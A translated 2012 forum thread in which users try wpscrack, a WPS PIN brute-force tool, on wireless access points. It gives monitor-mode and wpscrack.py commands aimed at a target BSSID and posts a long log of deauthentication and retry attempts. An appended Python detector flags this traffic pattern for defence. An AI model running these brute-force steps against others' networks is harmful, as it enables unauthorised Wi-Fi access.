Brothers who like testing, come on: wpscrack, another brute-force tool built on the same principle as reaver

This post was last edited by hwfsd on 2012-1-16 20:48.

Test environment: the author used BackTrack 5 R1 with an ath9k-chipset wireless card. For compatibility reasons, matching the author's test environment is best.

PS: reaver brute-forces the PIN by drawing random numbers from 0-9999; wpscrack brute-forces the PIN from 0-9999 in natural numeric order.

PS: My test environment here is the same as the author's, and today's test seems to have succeeded (pictures in post #2), but the 1st stage went past the first four digits of the AP's real PIN (the AP's real PIN begins with 8498, and picture 4 clearly shows it had already passed that); because the AP locked up, I could not test through to the end.

With nothing better to do, I went and read the wpscrack author's blog carefully: http://sviehb.wordpress.com/2011/12/27/wi-fi-protected-setup-pin-brute-force-vulnerability/ (needs a way past the firewall). Many people's tests failed, and the author stresses two details. First: scapy 2.2.0 must be installed, and it must be exactly that version. Second: the letters in MAC addresses must be lowercase.
Test steps:
1. Install scapy 2.2.0 first
   Unpack it, enter the directory: python setup.py install
2. Unpack wpscrack and enter the directory
   airmon-ng start wlan0
   iwconfig mon0 channel X (X is the channel of the AP under test)
   ./wpscrack.py --iface mon0 --client xx:xx:xx:xx:xx:xx --bssid yy:yy:yy:yy:yy:yy --ssid TESTAP --dh 0 -v
PS: xx --- your own wireless card's MAC address; yy --- the AP's MAC address; TESTAP --- the AP's SSID
Feedback from brothers who have tested is welcome, even a single success would be good. Help bump the OP's thread, and earn a few points while you're at it.

This post was last edited by hwfsd on 2012-1-16 18:34.
These are today's test pictures; the first 3 are all normal, but in the 4th the brute force has passed the first 4 digits of the AP's real PIN (the real PIN's first 4 digits are 8498).

The road of scientific research is winding; I'll bump you, and hope that many experts come and pool their collective wisdom!

Reply to #3 shiyizhe
Just testing; the software was written by someone else.

Deal with the little fat one first, then come and greet you.

Having a look, learning something!

You're great, the software isn't sold for money, unlike the others.......

Following closely in the OP's footsteps.

Passwords have nowhere to hide :lol

This post was last edited by bg5uv on 2012-1-16 10:04.
ubuntu + 8187L did not succeed. It does not run through PINs.
> M2
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.132 seconds
------------------- attempt #69
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
<- M1
-> M2
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.125 seconds
------------------- attempt #70
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
<- M1
-> M2
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.119 seconds
------------------- attempt #71
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.111 seconds
------------------- attempt #72
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- M1
-> 802.11 deauthentication
attempt took 1.424 seconds
------------------- attempt #73
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.199 seconds
------------------- attempt #74
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.167 seconds
------------------- attempt #75
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.147 seconds
------------------- attempt #76
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
<- M1
-> M2
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.124 seconds
------------------- attempt #77
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.146 seconds
------------------- attempt #78
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
<- M1
-> M2
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.141 seconds
------------------- attempt #79
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.143 seconds
------------------- attempt #80
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
<- M1
-> M2
TIMEOUT!!
-> 802.11 deauthentication
attempt took 5.113 seconds
------------------- attempt #81
Trying 00000000
-> 802.11 deauthentication
-> 802.11 authentication request
<- 802.11 authentication response
-> 802.11 association request
<- 802.11 association response
-> EAPOL start
<- EAP request identity
-> EAP response identity
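Seen from the AP or a wireless IDS, every attempt in the log above is the same short exchange (authentication, association, EAPOL start, EAP identity, M1/M2, then deauthentication) repeated roughly every 5 seconds. The detector below is an added example, not code from this thread or from wpscrack; it assumes an event stream of (seconds, client MAC, event name) records, with the MAC addresses and timings constructed to replay that pattern, and flags any client that begins more WPS registrar sessions in a sliding window than a normal enrolment ever would.

```python
from collections import defaultdict
# Event labels as they appear in the posted exchange; a WIDS would map
# frame types and EAP-WSC messages onto the same names.
WPS_START = "EAPOL start"
DEAUTH = "802.11 deauthentication"
# One attempt as seen on the air, mirroring the log above.
ATTEMPT_STEPS = ["802.11 authentication request", "802.11 association request",
                 WPS_START, "EAP response identity", "M2", DEAUTH]

def max_wps_starts_in_window(events, window=60.0):
    """Per client MAC, the most WPS sessions (EAPOL start) begun inside any
    sliding `window` seconds. events: (seconds, client_mac, event_name)."""
    starts = defaultdict(list)
    for t, client, name in events:
        if name == WPS_START:
            starts[client].append(t)
    peak = {}
    for client, times in starts.items():
        times.sort()
        lo, best = 0, 0
        for hi, t in enumerate(times):
            while t - times[lo] > window:  # slide the window's left edge
                lo += 1
            best = max(best, hi - lo + 1)
        peak[client] = best
    return peak

def flag_wps_bruteforce(events, threshold=10, window=60.0):
    """Clients whose WPS session rate reaches `threshold` per `window`: a real
    enrolment starts one or two sessions, a PIN brute force one per PIN."""
    peak = max_wps_starts_in_window(events, window)
    return sorted(c for c, n in peak.items() if n >= threshold)

def synth_attempts(client, n, start=0.0, period=5.13):
    """Constructed sample: replay the posted per-attempt exchange n times,
    about every 5 s as in the log."""
    events = []
    for i in range(n):
        base = start + i * period
        events += [(base + k * 0.1, client, s) for k, s in enumerate(ATTEMPT_STEPS)]
    return events

# Constructed traffic: one client cycling PINs, one normal client enrolling once.
SAMPLE = synth_attempts("02:00:00:00:00:01", 12) + [
    (3.0, "02:00:00:00:00:02", "802.11 authentication request"),
    (3.2, "02:00:00:00:00:02", WPS_START),
]
```

On an AP, the same signal (many WPS sessions from one MAC in a short time) is what WPS lockout after a few failed PIN attempts is meant to react to; an AP without that lockout, or one that locks up entirely as in the first post, is the case this rule is for.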